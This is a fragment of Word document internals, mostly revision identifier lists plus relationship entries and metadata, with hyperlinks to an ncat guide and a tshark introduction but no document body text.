    <w:rsid w:val="00255D57"/>
    <w:rsid w:val="00255E8B"/>
    <w:rsid w:val="00256DCF"/>
    <w:rsid w:val="00266A3C"/>
    <w:rsid w:val="00266BC8"/>
    <w:rsid w:val="00271229"/>
    <w:rsid w:val="00271F23"/>
    <w:rsid w:val="00273576"/>
    <w:rsid w:val="00274B6C"/>
    <w:rsid w:val="00283EC2"/>
    <w:rsid w:val="002965EE"/>
    <w:rsid w:val="00297205"/>
    <w:rsid w:val="002973FE"/>
    <w:rsid w:val="00297AE8"/>
    <w:rsid w:val="00297D18"/>
    <w:rsid w:val="002A1C76"/>
    <w:rsid w:val="002A2846"/>
    <w:rsid w:val="002A414E"/>
    <w:rsid w:val="002A5882"/>
    <w:rsid w:val="002A5975"/>
    <w:rsid w:val="002B1834"/>
    <w:rsid w:val="002B1C50"/>
    <w:rsid w:val="002B2078"/>
    <w:rsid w:val="002B33EF"/>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673B"/>
    <w:rsid w:val="00636749"/>
    <w:rsid w:val="006477BA"/>
    <w:rsid w:val="00650DB7"/>
    <w:rsid w:val="00651960"/>
    <w:rsid w:val="0065661A"/>
    <w:rsid w:val="00661775"/>
    <w:rsid w:val="006638A1"/>
    <w:rsid w:val="00671A36"/>
    <w:rsid w:val="00671FF6"/>
    <w:rsid w:val="00672A08"/>
    <w:rsid w:val="00674D94"/>
    <w:rsid w:val="00676D4D"/>
    <w:rsid w:val="006852BE"/>
    <w:rsid w:val="0068593F"/>
    <w:rsid w:val="00685AB3"/>
    <w:rsid w:val="0068646F"/>
    <w:rsid w:val="006910E9"/>
    <w:rsid w:val="00691C4D"/>
    <w:rsid w:val="00693D70"/>
    <w:rsid w:val="00694487"/>
    <w:rsid w:val="0069585B"/>
    <w:rsid w:val="00696BBA"/>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1887"/>
    <w:rsid w:val="006F18EA"/>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48C8"/>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626B"/>
    <w:rsid w:val="007F2250"/>
    <w:rsid w:val="007F5199"/>
    <w:rsid w:val="00807AC3"/>
    <w:rsid w:val="008142D4"/>
    <w:rsid w:val="00824990"/>
    <w:rsid w:val="0082507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54A37"/>
    <w:rsid w:val="00960403"/>
    <w:rsid w:val="00962DCF"/>
    <w:rsid w:val="00965F49"/>
    <w:rsid w:val="00973499"/>
    <w:rsid w:val="00973F03"/>
    <w:rsid w:val="009821FA"/>
    <w:rsid w:val="009842A2"/>
    <w:rsid w:val="00984AFB"/>
    <w:rsid w:val="00985C62"/>
    <w:rsid w:val="00987081"/>
    <w:rsid w:val="0099677B"/>
    <w:rsid w:val="009A232B"/>
    <w:rsid w:val="009A350D"/>
    <w:rsid w:val="009A4F2C"/>
    <w:rsid w:val="009B1720"/>
    <w:rsid w:val="009B38B2"/>
    <w:rsid w:val="009B5070"/>
    <w:rsid w:val="009C1E9C"/>
    <w:rsid w:val="009C33DB"/>
    <w:rsid w:val="009C5564"/>
    <w:rsid w:val="009D1451"/>
    <w:rsid w:val="009D1D73"/>
    <w:rsid w:val="009D252D"/>
    <w:rsid w:val="009D6A10"/>
    <w:rsid w:val="009D6AE2"/>
    <w:rsid w:val="009E3638"/>
    <w:rsid w:val="009E376C"/>
    <w:rsid w:val="009E423B"/>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297B"/>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8172E"/>
    <w:rsid w:val="00A82F76"/>
    <w:rsid w:val="00A8459A"/>
    <w:rsid w:val="00A8484F"/>
    <w:rsid w:val="00A84FF9"/>
    <w:rsid w:val="00A93CC8"/>
    <w:rsid w:val="00A9493A"/>
    <w:rsid w:val="00A9784E"/>
    <w:rsid w:val="00A97AEF"/>
    <w:rsid w:val="00AA5D08"/>
    <w:rsid w:val="00AB0192"/>
    <w:rsid w:val="00AB7690"/>
    <w:rsid w:val="00AC2AA7"/>
    <w:rsid w:val="00AD0C8F"/>
    <w:rsid w:val="00AD3388"/>
    <w:rsid w:val="00AD5F3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32748"/>
    <w:rsid w:val="00B34182"/>
    <w:rsid w:val="00B436F4"/>
    <w:rsid w:val="00B437A9"/>
    <w:rsid w:val="00B465B9"/>
    <w:rsid w:val="00B50B1F"/>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4885"/>
    <w:rsid w:val="00BE4EE4"/>
    <w:rsid w:val="00BE5774"/>
    <w:rsid w:val="00BE61E3"/>
    <w:rsid w:val="00BF2861"/>
    <w:rsid w:val="00BF333E"/>
    <w:rsid w:val="00BF3995"/>
    <w:rsid w:val="00BF7F60"/>
    <w:rsid w:val="00C00E4C"/>
    <w:rsid w:val="00C128DD"/>
    <w:rsid w:val="00C14A64"/>
    <w:rsid w:val="00C14A99"/>
    <w:rsid w:val="00C1553E"/>
    <w:rsid w:val="00C15CC0"/>
    <w:rsid w:val="00C17FB6"/>
    <w:rsid w:val="00C22827"/>
    <w:rsid w:val="00C23F9F"/>
    <w:rsid w:val="00C25F3B"/>
    <w:rsid w:val="00C26D4F"/>
    <w:rsid w:val="00C26EA8"/>
    <w:rsid w:val="00C278AB"/>
    <w:rsid w:val="00C34810"/>
    <w:rsid w:val="00C375DF"/>
    <w:rsid w:val="00C41569"/>
    <w:rsid w:val="00C5096A"/>
    <w:rsid w:val="00C50C0C"/>
    <w:rsid w:val="00C55B22"/>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A1549"/>
    <w:rsid w:val="00CA1D6E"/>
    <w:rsid w:val="00CA22F7"/>
    <w:rsid w:val="00CB1C7F"/>
    <w:rsid w:val="00CC2A84"/>
    <w:rsid w:val="00CC5810"/>
    <w:rsid w:val="00CD7E2D"/>
    <w:rsid w:val="00CE09DB"/>
    <w:rsid w:val="00CE13C5"/>
    <w:rsid w:val="00CE3661"/>
    <w:rsid w:val="00CF0D21"/>
    <w:rsid w:val="00CF1F02"/>
    <w:rsid w:val="00CF6FE8"/>
    <w:rsid w:val="00D0573D"/>
    <w:rsid w:val="00D05C2A"/>
    <w:rsid w:val="00D06506"/>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94693"/>
    <w:rsid w:val="00D9471F"/>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7720"/>
    <w:rsid w:val="00E117BC"/>
    <w:rsid w:val="00E143CD"/>
    <w:rsid w:val="00E165B7"/>
    <w:rsid w:val="00E166BD"/>
    <w:rsid w:val="00E2001F"/>
    <w:rsid w:val="00E2757A"/>
    <w:rsid w:val="00E30A78"/>
    <w:rsid w:val="00E320B6"/>
    <w:rsid w:val="00E35B71"/>
    <w:rsid w:val="00E37216"/>
    <w:rsid w:val="00E47AB9"/>
    <w:rsid w:val="00E5761F"/>
    <w:rsid w:val="00E621F7"/>
    <w:rsid w:val="00E625AA"/>
    <w:rsid w:val="00E638E9"/>
    <w:rsid w:val="00E736CA"/>
    <w:rsid w:val="00E770BF"/>
    <w:rsid w:val="00E81CC3"/>
    <w:rsid w:val="00E83B41"/>
    <w:rsid w:val="00E92707"/>
    <w:rsid w:val="00E9321D"/>
    <w:rsid w:val="00EA496D"/>
    <w:rsid w:val="00EB70BE"/>
    <w:rsid w:val="00EB7BE6"/>
    <w:rsid w:val="00ED58A6"/>
    <w:rsid w:val="00EE018E"/>
    <w:rsid w:val="00EE7DAB"/>
    <w:rsid w:val="00EF2092"/>
    <w:rsid w:val="00EF3DB6"/>
    <w:rsid w:val="00EF4CD3"/>
    <w:rsid w:val="00EF54C9"/>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70303"/>
    <w:rsid w:val="00F76BCB"/>
    <w:rsid w:val="00F77345"/>
    <w:rsid w:val="00F809F4"/>
    <w:rsid w:val="00F84925"/>
    <w:rsid w:val="00F90935"/>
    <w:rsid w:val="00F93A3C"/>
    <w:rsid w:val="00F93EE4"/>
    <w:rsid w:val="00F97A84"/>
    <w:rsid w:val="00FA0197"/>
    <w:rsid w:val="00FA133D"/>
    <w:rsid w:val="00FB5FB1"/>
    <w:rsid w:val="00FB7BA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544"/>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a7ec7f65a22f4a4e" Type="http://schemas.microsoft.com/office/2019/09/relationships/intelligence" Target="intelligence.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numbering" Target="numbering.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/ncat/guide/index.html" TargetMode="External"/><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infosecwriteups.com/introduction-to-tshark-b425fc86ef0d"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4.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893</Words>
  <Characters>107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2</cp:revision>
  <cp:lastPrinted>2011-03-30T20:10:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-18T00:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-18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